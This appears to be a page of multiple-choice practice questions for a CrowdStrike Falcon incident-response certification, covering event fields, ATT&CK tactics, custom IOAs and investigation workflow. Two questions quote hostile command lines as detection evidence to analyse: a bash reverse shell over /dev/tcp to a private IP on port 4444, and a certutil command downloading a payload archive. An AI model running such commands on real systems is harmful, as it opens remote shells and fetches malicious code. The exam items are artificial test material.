Pre-Winter Sale Special - Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: sntaclus

In the context of raw event searching, the term ' ProcessRollup2 ' refers to a value within which field?

A.

event_type

B.

event_simpleName

C.

action_id

D.

process_status

The Falcon console integrates heavily with the MITRE ATT AND CK framework to provide industry-standard context. Which of the following tactics displayed in the detection UI is a direct implementation of a MITRE ATT AND CK tactic?

A.

Malware Action

B.

Impact

C.

Intelligence-Based Match

D.

Script-Based Execution

Responders must understand the limitations and capabilities of custom rules. Which of the following statements about custom IOAs is FALSE?

A.

They can be used to monitor or block specific command-line strings.

B.

A Custom IOA rule group can only be applied to one single prevention policy.

C.

They can generate ' Informational ' detections if set to the ' Monitor ' action.

D.

They allow for pattern matching using wildcards or specific strings.

To ensure that a malicious file cannot be accidentally executed or accessed by other processes, how are quarantined files stored on the local endpoints?

A.

They are hidden within the Windows System32 directory.

B.

They are stored in an encrypted format.

C.

They are renamed with a random 32-character extension.

D.

They are moved to a password-protected ZIP file on the desktop.

Refer to the image.

Command line:

/bin/bash -c sh -i > & /dev/tcp/172.17.0.21/4444 0 > & 1

File path:

/bin/bash

You receive a detection on the Bash process indicating the command line in the image above.

Based on the command line, what is the next step you should take?

A.

Investigate the host for manipulation of the root folder

B.

Investigate the host for any Potentially Unwanted Programs (PUP)

C.

Investigate the host for an interactive remote terminal

D.

Investigate the host for developer activity

To perform a deep-dive investigation into a specific detection, a responder needs to pivot to a process timeline. What is the minimum information required to be gathered from the detection before making this pivot?

A.

The External IP and the Username of the logged-in user.

B.

The Agent ID (AID) and the Target Process ID (TargetProcessId_decimal).

C.

The MAC Address of the host and the SHA256 hash of the file.

D.

The Policy ID and the timestamp of the first event.

You receive a detection on certutil.exe executing the following command line:

certutil -urlcache -split -f " hxxps[:]//github[.] com/Endizz/Payloads/raw/main/MyMaliciousTools.zip " " MyMaliciousTools.zip "

What is the appropriate next step to discover how this occurred?

A.

Investigate host event logs pertaining to logon-type events

B.

Investigate the process tree and determine what executed certutil.exe

C.

Investigate the host by using on-demand scans

D.

Investigate the host’s firewall settings

When using ' User Search ' to investigate a potentially compromised account, which of the following is NOT a filter available in the User Search?

A.

Username

B.

Hostname

C.

Process ID

D.

Time Range

The Falcon console is divided into several modules. Timelines (Host and Process) are technically a part of which Falcon page?

A.

Activity

B.

Investigate

C.

Configuration

D.

Dashboards

An adversary is attempting to disable security features by modifying the system registry. Which of the following native Windows processes is specifically designed to create, modify, and delete Registry keys via the command line?

A.

reg.exe

B.

taskmgr.exe

C.

lsass.exe

D.

svchost.exe